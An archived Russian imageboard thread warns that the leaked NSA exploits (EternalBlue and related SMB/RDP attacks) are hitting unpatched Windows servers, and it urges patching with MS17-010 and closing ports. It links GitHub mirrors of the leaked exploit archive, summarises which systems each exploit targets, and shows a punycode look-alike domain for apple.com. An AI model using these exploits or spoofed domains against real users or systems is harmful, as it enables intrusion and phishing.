Этого треда уже нет.
Это копия, сохраненная 18 апреля 2017 года.

Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее

Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
6 Кб, 697x164
Не знаю, на какую доску вбросить, кину тут. #151184817 В конец треда | Веб
Не знаю, на какую доску вбросить, кину тут.

14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.

Не прошло и трех дней, как НАЧАЛОСЬ.

В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.

Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.

https://github.com/misterch0c/shadowbroker/

У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок.
Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой.
Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.
115 Кб, 932x792
#2 #151185399
В списке много всякого, что заставит обладателя непропатченной винды отложить большой кирпич.

А патч вышел только в прошлую пятницу, обновились не все.
151219069
#3 #151186874
бамп еще одной свежей (на самом деле нет) штукой
http://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html

Сидишь на хроме, проверяешь ссылки по которым ходишь? Не все так однозначно.
151216981
#4 #151187104
Нихуя не понял из тобой сказанного. Воще похуй.
151188996
#5 #151188996
>>151187104
Бывает.
На линуксе сидишь, или на винде?

Возможно, пост увидит кто-то, кому не похуй.
Реально, достаточно злая и внезапная штука, которая может сделать так, что станет ОЧЕНЬ НЕ ПОХУЙ.

По степени опасности напоминает времена XP sp2, когда стоило только выставить голую винду в интернет, как сразу что-то прилетало.
151189953
#6 #151189953
>>151188996
увидел, склонировал себе репу с гитхаба
Спасибо, добрый человек
151191280
#7 #151191280
>>151189953
На той репе отсутствует часть файлов, бери уж с оригинала на меге. https://github.com/x0rz/EQGRP

Но тред-то не об этом.
Эти эксплойты пошли в жизнь, они действительно рабочие и доставляют массу неприятностей.

У кого открыты порты rdp и smb в интернет, внутри локальной сети - позаботьтесь о патчах.
Ибо любой дятел с нулевыми правами может хакнуть ваш сервак (и уже есть шифраторы, которые это используют).

Собственно тема только стартовала, через пару-тройку дней будет вой в интернетах "ой, меня похакали, что делать".
151192610
#8 #151192087
>>151184817 (OP)
С разморозкой. Свежака ноль целых хуй десятых, полезно будет разве что уженешкольникам и админам их уровня.

мимо системный инженер в области ИТ безопасности
151192549
#9 #151192549
>>151192087

> полезно будет разве что уженешкольникам и админам их уровня.


Для них и писано. Лишний раз пошевелятся и накатят патчи.

>С разморозкой. Свежака ноль целых хуй десятых


А вот это не факт. Что-то пофиксили давно, что-то - только по факту в прошлую пятницу. Что-то осталось незакрытым.
Эксплойты выкатили в общий доступ всего три дня назад.
https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

Но. Все ли вовремя обновляются? Все ли админы-эникеи знают про это?

Пусть уж лучше кто-то прочтет, почешет репу и защитится, чем будет потом прыгать с горящей сракой.
151201590
#10 #151192610
>>151191280

>https://github.com/x0rz/EQGRP


Вбрасывай в /crypt/
151192973
#11 #151192973
>>151192610
Там и так все давно в курсе наверняка.

Я постил именно для того, чтобы обратить внимание энкеев и недоадминов. Да вообще всех.
Впереди явно будет эпидемия лютых шифровальщиков, которые в случае забивания на обновления и прочее могут легко
а) повышать приоритет до админа и шифровать все, до чего дотянутся.
б) искать машины с открытыми smb и rdp портами в локальной сети (а таких мелкофирм, где три компа и сервак - тысячи) и получать с помощью этого админский доступ, шифруя все на них.

Так что это варнинг всем, будьте аккуратнее и делайте бекапы и ставьте патчи.
#12 #151193536
>>151192973
Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
Теперь, похоже, обновиться придётся.

А вообще у меня странная идея - выдрать из винды встроенный SMB-сервер и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
151201210
#13 #151193578
>>151192973
П.С. я б потолковал ещё на тему инфосекьюрити. Ты в irc/jabber'е обитаешь?
#14 #151194337
>>151184817 (OP)
Обычным юзверям можно не беспокоиться, я правильно понял?
151194671
#15 #151194671
>>151194337
Обычным лучше тоже побеспокоиться. Если даже работаешь из-под ограниченнгого пользователя, то на непатченной машине эксплойт может выполнить код с полными правами.
Тоже обновляйся.

Кроме того, я уже писал выше, есть старый и эффективный способ фишинга, тоже внезапно слишком много стало встречаться.
Например вот сайт - https://www.аррӏе.com/ - выглядит нормально? (если макаба не сломает ссылку)
#16 #151196020
>>151192973
О, значит биток полезет вверх. Надо закупиться
151201483
#17 #151196143
Если я сижу за НАТом, мне же похуй - так? Это хакиры диапазоны мканят, а меня недосканят? Так?
151198841
#18 #151196601
>>151184817 (OP)
На моем ноуте и так уже было установлено куча репаков разных игр с торрентов, где аноны в комментах кидали логи касперского что там какой-то файл заражен и мне было похуй, ибо лень был оперекачивать. Отключен мелкомягкий фаервол и прочее, потому что не нужною
А ты тут о некроОС.
Хотя, XP я бы поставил.
151201210
#19 #151197067
>>151194671
Что за магия?
151198841
#20 #151197519
>>151194671

>выглядит нормально?


Да. Опиши, нихуя не понятно.
Типа вместо одной буквы там какой-то другой?
151198841
#21 #151198556
Опушка, два чаю тебе
151199410
152 Кб, 424x600
#22 #151198747
Лол. Ну, пойду бекабить всё, что вижу. Спаисбо, оп.
151200260
#23 #151198841
>>151196143

>Если я сижу за НАТом, мне же похуй - так?


Как сказать. Если высунул rdp, чтобы ходить на домашнюю тачку с работы или из отпуска - ты попал.

Если нет, то вариант второй - ссылка типа той, что выше, ведущая якобы на обычный сайт. Даже внимательный анон может кликнуть по такой, не все же пиксельхантингом заниматься.
А дальше - либо эксплойты в adobe flash, дыры постоянно находятся свежие и все с remote execution, либо еще что-то похожее.

Например письмо от банка, от МТС/билайна с якобы детализацией, что-то ОБЫЧНОЕ. Чуть невнимательно глянул, типа как с той ссылкой на эппл.ком - и все, чпок, здравствуйте.

>>151197067
>>151197519
Да, punycode, если не присматриваться, то не заметишь сразу.
А много ли анонов-параноиков, которые пыцрятся в ссылку, прежде чем перейти по ней, особенно когда она выглядит знакомо?
#24 #151199030
>>151184817 (OP)
О чем тут говорят?
#25 #151199319
Есть отдельный инсталлер для спермерки?
#26 #151199410
>>151198556

Спасибо. Вещь действительно опасная и в первую очередь для обычноанонов, которые начитались в интернете про rdp и прочее, а про безопасность не подумали.
И админы поневоле (он же юрист, "но ты же шаришь в компьютерах") тоже попадают в зону риска.

Я почему тред стартанул - у меня на одном из серваков висела виртуалка с виндой, так, для обхода всяких блокировок торрентов и прочего. Ничего важного, просто чистая винда, обновки стояли вручную по март.
Особо секьюрностью не заморачивался, но наружу торчал лишь рдп порт на нестандартном 43210 вместо 3389.
Поставил всего месяц назад. Судя по остаткам логов - один из тех самых эксплойтов, шифровано все, что можно - запустился из-под админа.
Так-то похрен, новую виртуалку из бекапа раскатаю, но подумалось об анонах, у которых есть какие-то важные данные на таких серваках, а на безопасность они подзабили.
#27 #151200260
>>151198747
ПИДОР БЛЯТЬ! ВЫ ПОСМОТРИТЕ, СУКА, НА НЕГО, НЕ ВЫ ПОСМОТРИТЕ СУКА НА НЕГО. ОН БЭКАПИТЬ ПОШЁЛ!
ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
151201483
#28 #151201210
>>151193536

>и впихнуть туда кросскомпилированный линуксовый сервер и клиент.


>ECHOWRECKER remote Samba 3.0.x Linux exploit.


Из той же пачки.

>>151196601

>А ты тут о некроОС.


ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)
ETERNALBLUE is a SMBv2 exploit for Windows 7 SP1 (MS17-010)

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Affected Software and Vulnerability Severity Ratings: Вся линейка от ХР до 10.
Патч от марта, но много ли анонов держат постоянные автообновляторы?

Очень много например таких:
>>151193536

>Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.

#29 #151201483
>>151196020

>О, значит биток полезет вверх. Надо закупиться


Ты прав, скоро спрос возрастет.

>>151200260

>ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ


Уважаемый, для вас тоже есть решение - обновленный пак иконок на сервер (по аналогии с торпедой автомобиля), окропить сервер святой водой, помолиться, чтобы минула чаша сия.
151201689
#30 #151201590
>>151192549

>Пусть уж лучше кто-то прочтет, почешет репу и защитится


Вот сцукл, а поддержка висты закончиласб аккурат перед этим сливом...
#31 #151201689
>>151201483
Иди нахуй, долбоеб. К чему твой троллинг? Я к тому что у кого-то есть 6 hdd, по 3 терабайта каждый а у кого то нет
151201783
#32 #151201783
>>151201689
А, ну извини, я думал что троллишь ты.

Да и радость от этих 6 хдд? Их тоже бекапить надо, они дохнут иногда, а это опять расходы. Все относительно.
151202156
#33 #151202156
>>151201783
Радость от того что имеешь дома часть интернетов, которые к тому времени уже выпилят.
HDD, не SSD, у меня жесткий диск лет 9 работает и до сих пор норм.
151202476
#34 #151202476
>>151202156

>лет 9 работает и до сих пор норм.


Я бы на твоем месте не был бы так спокоен.
Увы, это не троллинг.
14 Кб, 1421x316
#35 #151206632
Пошла жара. На буржуйских форумах начинается бугурт. Кто-то с эксплойтом и шифратором прошел по VPS на самых популярных площадках и собрал жатву.
#36 #151211280
>>151194671
98% обычных юзеров за NATом сидят и им плхваще.
#37 #151211566
Что там с RDP? можно без логина\пароля подключиться или что?
151212706
#38 #151212139
эксплоиты в ехе чтоли?
#39 #151212706
>>151211566
Да, если открыт порт rdp (или smb), если операционка windows 7 или винсервер 2003-2008-2012 и если не стоит последний патч от майкрософт - получаем логин с правами SYSTEM
151212858151213788
#40 #151212858
>>151212706
пиздёж
151213127
#41 #151213127
>>151212858
https://www.youtube.com/watch?v=ZgvkNjNt4BM

В данное время все, кто сидел с открытым rdp и непатченной виндой на хецнере и ovh тихо охреневают.
Я и сам охренел, когда мою виртуалку грохнули именно таким образом.

Вся инфа же в треде есть, можешь сам проверить.
151213309
10 Кб, 240x249
#42 #151213309
151213550
#43 #151213550
>>151213309
А Я О ЧЕМ И ГОВОРЮ.

У кого серваки/компы смотрят открытым портом rdp в инет - БЕГОМБЫСТРОБЛЕА патчиться.

Меня не спасло даже переназначение 3389 порта на левый типа 43210. Виртуалке месяц исполнился, в марте развернул, пропатчил на тот момент до упора и ОТКЛЮЧИЛ обновления, чтобы не мешали, все равно был временный вариант.
Мне-то норм, а вот тех, у кого похожая ситуация хочу предупредить.
151214036151217472
#44 #151213788
>>151212706
Охуеть. Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
151214004
#45 #151213939
Кстати, за каким хуем они это в сеть выкладывают? что доказать хотят?
151214230
#46 #151214004
>>151213788

>Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.


Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Я ради лулзов просканировал диапазон своего провайдера - их там море.

И далее, это работает и внутри локальной сети, изнутри. Если открыты сетевые шары - здраститя, заходите.
Добро пожаловать в 2007й кажется, или когда там дыры в rpc winxp sp2 были размером с ворота?
151214159
#47 #151214036
>>151213550
Лол.
Моей предыдущей конторе пизда.
Жаль я понаблюдать не смогу.
151214576
#48 #151214159
>>151214004

>Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.


Ну хрен знает, много где админил и как правило никто не использует RDP. Радмин, тимвивер, ещё какая-то залупа - вот это пожалуйста.
А вообще изучал rdp-протокол и охуел от его толстоты.
#49 #151214195
Жаль, что троянского слона так и не дописал:(
#50 #151214230
>>151213939
Они - это кто?

Эти эксплойты - часть спизженного у NSA инструментария. Так-то фришный кусок архива выкладывали что-то около года назад, там все срали кирпичами с дырок в цисках и прочих суровых сетевых железяках.
А эта часть была под паролем, а пароль продавали за грязные даллары.
То ли купил кто, то ли еще - я в подробности не вдавался, но главное пароль три дня назад всплыл в общем доступе.
Тот годовалый архив-шкатулка Пандоры таки им раскодируется.
И за три дня умельцы уже привинтили эксплойт к шифратору и прошлись маршем смерти по hetzner, ovh и прочим конторам, где многие любили хостить такие вот винбоксы.
151214340
#51 #151214340
>>151214230
А, лол, я то думал что какие-то хакеры решили чисто из собственных мотивов в сеть выложить. Ну, раз продавали, тогда молодцы.
#52 #151214389
Блять на человеческом языке обьясните че дают эти порты то бля?? я могу подключиться к чужому компу? или на сервак например чужой? например сервак игры у кого стоит я могу ломануть базу данных?
151214439151214449
#53 #151214439
>>151214389

>я могу подключиться к чужому компу? или на сервак например чужой?


Да, если на нём стоит удалённое подключение.
#54 #151214449
>>151214389
Не старайся вникнуть во все это, лучше ложись спать, завтра опять бежать в М.Видео на работу.
151214625
#55 #151214576
>>151214036

>Моей предыдущей конторе пизда.


А то, лично знаю таких умельцев. Их на самом деле дофига таких непуганных.

Так что всем, кто в курсе, про что тред - обновляйтесь, закрывайте порты, делайте вход через vpn и ssh туннели - никаких откртытых наружу нативных майкрософт портов.
#56 #151214625
>>151214449

>завтра опять бежать в М.Видео на работу.


У многих таких работников из аналогов мвидео местного разлива явно будет выходной. сервак-то не работает, все.
#57 #151214653
Обновления-то будут в треде?
151214746
#58 #151214746
>>151214653
Они уже есть - выше в треде,ссыль на сайте майкрософта.
Те, кто отключил у себя обновки, опасаясь внезапного пришествия дриснятки - выбирайте, какой вам стул удобнее - с пиками в виде эксплойтов или с удобными мягкими и длинными анальными зондами десятой версии от Майкрософт, лол.
#59 #151214996
Сколько помню Microsoft, регулярно раз в несколько лет просираются таким образом. Причем каждый раз дыры глобальные и дают полный доступ. Они там их по ходу специально встраивают для всяких спецслужб.
151215507
#60 #151215095
Вся суть винды. Администрирование сервера по рдп. Фаервол не настроен. Вагон дырок в АНБ. А потом ЗАЩООО.
151215507
#61 #151215332
Аноны,о чем вы тут базарите? Я НИХУЯ не понимаю. Я ламер в юзании пк, объясните. Мне интересно
151215383151215507
#62 #151215383
>>151215332
Хакеры выложили программу, с помощью которой можно подключаться к компьютерам где есть удалённое управление.
151215438151215831
#63 #151215438
>>151215383
И по факту это все компьютеры, имеющие на борту шиндовс и смотрящие в интернеты напрямую. Кстати, не только шиндовс, там и соляра, и саноси.
151215507
#64 #151215507
>>151214996
А то. 2011, 2013 - дыры примерно такого же калибра. Дыры в ИЕ, которые тоже обеспечивали remote code execution
и кто бы мог подумать - никогда такого не было - и вот опять, снова.

>>151215095

> Администрирование сервера по рдп.


А там и не надо администрировать. Достаточно просто высунуть порт. Даже если в системе разрешено через рдп поработать только юзеру с насмерть урезанными правами.
Это примерно как дыра 11 года, когда можно было кучей пакетов UDP на закрытый порт проломиться до уровня system.
Винда такая винда.

Самое интересное, я так сейчас порыл в сети - куча "советов" как сделать удаленный доступ к себе домой, типа раньше-то рдп был ненадежный, а теперь - огого, можно так в инет выставлять, максимум - порт переназначить.

Интересно, сколько людей последовало таким советам?

>>151215332
Ну например аналогия. У тебя в квартире бронированная дверь, на подъезде домофон. Любой вася может открыть твою супербронированную дверь удаленно, потыкав в кнопки.
Фирма-установщик выпустила исправление, забытый винтик, который нужно вкрутить в замок. Но кто знает об этом, кто не знает, кому дойти лень до установщика.

>>151215438
Да, там и солярки много, и остальной экзотики.
Даже голосовой шлюз от Avaya замногобаксов тоже того...
#65 #151215655
если эксплойты такие массовые, почему мои серваки никто не взломал?
151215689151215731
#66 #151215689
>>151215655
Откуда ты знаешь?
151215865
#67 #151215731
>>151215655
Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.

У тебя рдп наружу торчит? Патчи стоят?
151215865
#68 #151215831
>>151215383
Если мой пк не подключен к инету (сижу тут онли с планшета) мне можно спать спокойно?
151215851151215872
#69 #151215851
>>151215831
нет, даже если пк выключен
#70 #151215865
>>151215689

>Откуда ты знаешь?


ничего подозрительного не заметил

>>151215731

>Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.


>У тебя рдп наружу торчит? Патчи стоят?


Да. win 2008r2, раз в несколько месяцев накатывал патчи.
151216119
#71 #151215872
>>151215831
Я сейчас подъеду, вскрою окно, подключусь по локалке и пока ты будешь тихо спать, я спижжу твою коллекцию прона и паст.
#72 #151216119
>>151215865

>Да. win 2008r2, раз в несколько месяцев накатывал патчи.



Ну так-то у меня на той несчастной виртуалке тоже 2008р2 стояла, последние патчи тоже в начале марта накатывал.
Исправление было 17 марта.

Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Где хостишься? Основная атака вчера и сегодня была на ovh, hetzner, redstation - в основном буржуйские хостинги.
Так что я бы тебе советовал не терять времени, а то может уже процесс идет.
Я для этого тред и начал, чтобы предупредить таких анонов.
151216246
#73 #151216246
>>151216119

>Я для этого тред и начал, чтобы предупредить таких анонов.


Так-то спасибо. Странно что на других порталах этой новости не видел.

>Исправление было 17 марта.


Какой KB ?

>Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.


Обновляюсь, но вешать ничего не буду, ибо это костыли.
151216613151216637
#74 #151216301
По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?
151216597151216613
#75 #151216597
>>151216301
от Windows 2000 и Server 2012 до Windows 7 и 8.
151217301
#76 #151216613
>>151216246

>Так-то спасибо. Странно что на других порталах этой новости не видел.


Через пару дней увидишь, гарантирую.
Это прямо вот сейчас происходит.
Посмотри на http://www.webhostingtalk.com/showthread.php?t=1643701 - первые очнувшиеся начинают появляться.

>Какой KB ?


https://technet.microsoft.com/library/security/ms17-mar

Там сплошь решето, кроме rdp и smb там еще замечательные дыры в обработчике PDF, в adobe flash, как обычно, в графических библиотеках.
И все такое няшное, все с remote code execution

>Обновляюсь, но вешать ничего не буду, ибо это костыли.


Ну мое дело сообщить, что с этой информацией кто будет делать - его проблемы.
Я бы вообще не стал ни одного нативного порта высовывать наружу. Туннель не проблема, vpn не проблема, ясно, что не так удобно, но увы, не то время, чтобы радоваться удобствам.

>>151216301

>По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?


Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Насчет десятки не уверен, но знакомые говорят, что подтверждается на 2012 сервере, так что я бы не рисковал.
151217013151217301
#77 #151216637
>>151216246

>вешать ничего не буду, ибо это костыли


Какие блядь костыли, это обычная практика.
151217013
62 Кб, 400x400
#78 #151216875
>>151184817 (OP)

>дедик с виртуалкой и доступом по рдп.


>доступом по рдп.


Как вы этой дрянью вообще пользоваться можете? Однажды пришлось ходить через виндовый сервер с rdp - как говна пожрал.

SSH:
$ ssh -t nigger@gate ssh faggot@target

Винда:
Открываешь RDP клиент. Отдельным окном, ясен хуй. Какой tmux, какой screen?
Ждем пока все откроется
На столе находим 'Shortcut to YOBASHELL.EXE' (хули не putty, но ладно)
Ждем
This software trial period has expired.
Ждем еще
Ищем так кнопку, потом еще одну, слышим крик из соседнего загона что ему тоже на этот сервер надо, а заходить можно по одному (там наверно типа секурно так настроено было, я не верю что ОС в 2017 году может быть таким тупым говном). Ищем дальше. 5 окон, 5 тулбаров, вкладочки, закладочки (ибо шелла с Ctrl-R не завезли), какая-то еще поебень.
Наконец открывается терминал целевой машины. Который занимает 60% от всего RDP окна.
Clipboard'ы, естественно, не работают
Ебануть порты? Редиректнуть ввод/вывод с локалхоста? SCP? Agent? Хуй знает где.
Через пять минут приходится освобождать этот нужник, ведь другим тоже в ту сеть надо.
Зато ТАЙЛЫ и ПЕЙНТ есть. Обои еще поменять можно.
151216943
#79 #151216943
>>151216875
А вот не пизди, по rdp даже в игры можно играть по directx, если скорость канала позволяет. Другие решения там даже близко не стояли.
151217156
#80 #151216981
>>151186874
И шо?
#81 #151217013
>>151216613

>Там сплошь решето


MS в своем стиле

>>151216637

>Какие блядь костыли, это обычная практика.


Обычная практика это подключение в один клик. А костылить подключение через vpn не вариант
151217105
#82 #151217105
>>151217013
Лол дебил. Одним кликом ты подключаешься к впн, вторым стартуешь рдп всё. Лишний клик ему лень сделать, зато будем сервак голой жопой выставлять в глобал, какой пиздец.
151217187151217340
#83 #151217156
>>151216943

>даже в игры можно играть


Охуенно. Как раз то, что нужно от сервака.
151217217
#84 #151217187
>>151217105
Это как все на домашней тачке-то сделать с обычной home виндой? Я даж и не знаю. А рдп очен просто включается.
мимокрок
151217282151217333
#85 #151217217
>>151217156
В натуре, я в кваки по rdp гонял. Он даже графические ускорители поддерживает.
#86 #151217282
>>151217187
Домашняя тачка не предназначена быть впн-сервером.
151217328151217384
#87 #151217301
>>151216597
>>151216613

>Вроде как все (от xp до 8.1 и соответственно 2008r2 точно).


Ммм. Понятненько. Зойпилите в тред ман для спермы, чтобы rdp слушал только впн интерфейс.
#88 #151217328
>>151217282
Ну значит нахуй идет впн-сервер. Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
#89 #151217333
>>151217187
tinc какой-нибудь накати
151217355
#90 #151217340
>>151217105
Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
151217634
#91 #151217355
>>151217333
Попробую.
#92 #151217375
>>151217328
Зато с дырами, азаза.
151217496
#93 #151217384
>>151217282

>не предназначена


>Домашняя тачка


Лолшто. Домашняя тачка как раз и предназначена любое говно туда пихать.
#94 #151217450
>>151217328
Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.
151217705
#95 #151217472
>>151213550
Что за rdp?
151217519151217658
2045 Кб, 330x204
#96 #151217496
>>151217375

>Зато с дырами, азаза.


Смотрите все, я у мамы крутой хакир и неуловимый джо в одном флаконе, впн умею настраивать.
151217803
#97 #151217519
>>151217472
Анальный зонд в винде встроенный.
#98 #151217540
>>151217328

>Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.


Ну, может кому-то нравится выставлять голую жопу в окно, за которой летают стаи хуёв, и надеяться, что ни один из них не воткнётся.
#99 #151217634
>>151217340

>Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.


Да там настройка вся в два клика, что за костыли?
Лишний раз перед коннектом на иконке щелкнуть?
С ssh сервером я по привычке. Чего сложного - на винде поднял, ключи создал, по клиентам раскидал.
Коннект - прокидываешь изнутри свой любимый порт 3389 на любой локальный, к нему же и коннектишься по rdp
Два клика.

VPN тоже не ядерная физика, есть же готовые решения, один раз прочитал - пользуйся.
Если у тебя сотрудники по удаленке к серверу коннектятся - то только так.

Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти можно было без проблем на нее зайти, так-то удобно.
На рабочем серваке так делать нельзя никак.
151217847
#100 #151217658
>>151217472
Remote Desktop - встроенная удаленка в винде.
90 Кб, 384x604
#101 #151217705
>>151217450

>Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.

151217728151217773
#102 #151217728
>>151217705
То есть ты даже не скрываешь, что АНБ следит?
151217917
#103 #151217773
>>151217705
Эталонный жопочтец. Конкретно ты никому не нужен. Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
151217810151217917
#104 #151217803
>>151217496

>неуловимый джо


Не принижайся. Ботнеты любят тебя и ты им очень нужен :3
#105 #151217810
>>151217773
Боты будут знать, что я жопу щекочу?
151217869
#106 #151217847
>>151217634

>Да там настройка вся в два клика, что за костыли?


В 2 клика? Там пердолиться надо неслабо.

>Чего сложного - на винде поднял, ключи создал, по клиентам раскидал


Ебать, еще с ключами я дела не имел. Во времена двухфакторной аутентификации для людей я буду еще ключи таскать.

>Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти


Так и у меня сервак для личного пользования и работы и что бы удобно было откуда угодно зайти. Естественно никаких критичных данных не хранится, поэтому и не пердолюсь. Если бы хранились то конечно бы сделал подключение через vpn.
151217908
#107 #151217869
>>151217810
Нет, боты сделают так, что тебе больше не на что будет жопу щекотать. Утром проснешься и увидишь, что все твои animal-gay-porn.jpg уже не .jpg.
151217905
#108 #151217905
>>151217869
У меня бэкап есть на дивиди.
#109 #151217908
>>151217847

>Во времена двухфакторной аутентификации


Так прикрути ее и к себе, хуле как маленький.
151217937
#110 #151217917
>>151217728
Лол. Это и есть эксплойты, утекшие из АНБ

>>151217773

>Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.


this

С одной стороны боты и вирусняки типа kido

А с другой стороны - скрипткидди и любой желающий васян по гайдам из инета. их уже наснимали за пару дней вагон https://www.youtube.com/watch?v=HeFtRv1aDZU

Так что новый виток спермоболи впереди.
151218013
#111 #151217937
>>151217908

>Так прикрути ее и к себе, хуле как маленький.


Да самому себе отсосать легче, чем накостылять двухфакторку в rdp
151217971
#112 #151217971
>>151217937
Нахуй в рдп, делай ее в впн, если так хочется.
151218028
#113 #151218008
Делайте самоуничтожающийся контейнер. Как вошел, просит код, ввел один раз не правильно - уничтожился.
151218055
#114 #151218013
>>151217917

>Так что новый виток спермоболи впереди.


Лол, кто бы мог подумать что win10 с принудительными автообновлениями вполне себе годнота
151218099151218110
#115 #151218028
>>151217971
впн с двухфакторкой? наркоман что-ли?
151218053151218072
#116 #151218053
>>151218028
Впн с двухфакторкой в самоунитожающемся контейнере.
#117 #151218055
>>151218008
Кинца про ХаКиРоВ насмотрелся?
151219364
#118 #151218061
Так, ладно. Я почти ничего не понимаю в кудахтерах, но тред напряг. Как себя обезопасить от этой срани?
#119 #151218072
>>151218028
Ну если уж так хочется двухфакторку, то хуле б нет. Вообще двухфакторка это и есть костыль для долбоебов, не могущих в ключи и сертификаты, проще смску вбить.
151218115
#120 #151218081
>>151218061
RDP выключи
Входящие соединения на роутере порежь
151218112151218188
#121 #151218089
>>151218061
Самое простое - не выключать автообновление винды.
#122 #151218099
>>151218013
Два стула.жпг
#123 #151218108
>>151218061
format c: попробуй
#124 #151218110
>>151218013
Это только то, что утекло. А сколько того, что не утекло?
151218158
#125 #151218112
>>151218081
А подробнее? Я все равно ничего не понял.
151218125151218183
#126 #151218115
>>151218061

>Как себя обезопасить от этой срани?


Отключи компьютер от сети

>>151218072

>костыль для долбоебов, не могущих в ключи и сертификаты


Ебал я ваши ключи и сертификаты. Технологии, ограничивающие удобство не нужны.
151218148151218155
#127 #151218125
>>151218112
Линукс короче ставишь, винду сносишь.
#128 #151218148
>>151218115

>ключи


>ограничивающие удобство


Это руки из жопы удобство ограничивают
151218211
#129 #151218149
10ко богам похуй
151218170
#130 #151218155
>>151218115

>Технологии, ограничивающие удобство не нужны.


Так нахуй вообще двух- или однофакторка. Убери пароли вообще, их так неудобно вводить.
151218211
#131 #151218158
>>151218110

>Это только то, что утекло. А сколько того, что не утекло?


С таким подходом тебе нужно отключить всё электричество в квартире и надеть шапочку из фольги, вдруг пришельцы по торсионным полям твои мысли читают.
151218194151218197
#132 #151218170
>>151218149
В 10ке просто дыры поновее встроили, которые еще через 5 лет опубликуют.
#133 #151218183
>>151218112
Гугл в помощь.

>rdp <твоя винда> отключить


><модель роутера> firewall incoming

#134 #151218188
>>151218081

>Входящие соединения на роутере порежь


Что за бред? Как я интернетами буду пользоваться?
151218210151218214
#135 #151218190
>>151184817 (OP)

>В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.


>виндоадмины


>админы



Эникеи, ты хотел сказать?
151218209151218372
#136 #151218194
>>151218158
Пришельцы знают, что я жопу щекочу.
#137 #151218197
>>151218158
Мне похуй. Пиздить мои данные никому не надо, а что до их уничтожения, ну так у меня полные бэкапы в сейфе лежат.
151218276151218336
#138 #151218209
>>151218190
А, ну да, тру админы только питуксы админят.
#139 #151218210
>>151218188
Они не нужны, по ним васяны лезут комп хакать.
#140 #151218211
>>151218148

>Это руки из жопы удобство ограничивают


Накати себе шапочку из фолги, псина

>>151218155

>Убери пароли вообще, их так неудобно вводить.


Лучше паролей еще ничего не придумали
#141 #151218214
>>151218188
Через исходящие. Или у тебя железный фаервол 91 года, не могущий в TCP?
#142 #151218254
>>151184817 (OP)
Среднестатистическому юзеру за NANом похуй. Проблема больше касается серваков с белым ip смотрящим в инет.
151218281
#143 #151218257
Ставьте впн по отпечатку пальца, боты не сломают.
#144 #151218276
>>151218197

>Пиздить мои данные никому не надо


Вот к этому мы и приходим, что все эти ваши rdp over vpn over ssh over tor нахуй никому не упали
151218298
#145 #151218281
>>151218254
Некоторые ISP внезапно белый IP дают.
#146 #151218298
>>151218276
Вдруг они запишут, как я тян ебу.
151218327151218330
#147 #151218327
>>151218298
Кому ты нахуй нужен, с террабайтами-то доступного порно
#148 #151218330
>>151218298
Двухфакторно ебешь, через тор по ssh.
151218353
#149 #151218336
>>151218197

>так никто твои данные пиздить и не будет. Ясен хуй. Будут просто DDoS/спам/proxy через тебя гнать.

#150 #151218353
>>151218330
Воображаемую тян.
#151 #151218370
Вот нашел на реддите

>block all incoming connections destined for port 137-139, 445, and 3389



Если у меня закрыты эти порты, то я в безопасности?
#152 #151218372
>>151218190
Эникеи, ламеры - да как не назови. Речь не о том, проблема-то реально серьезная, а люди пока еше не вдуплили в ее возможные последствия.

Можешь обклеить все стены сертификами и гордиться, этот тред не для тебя.
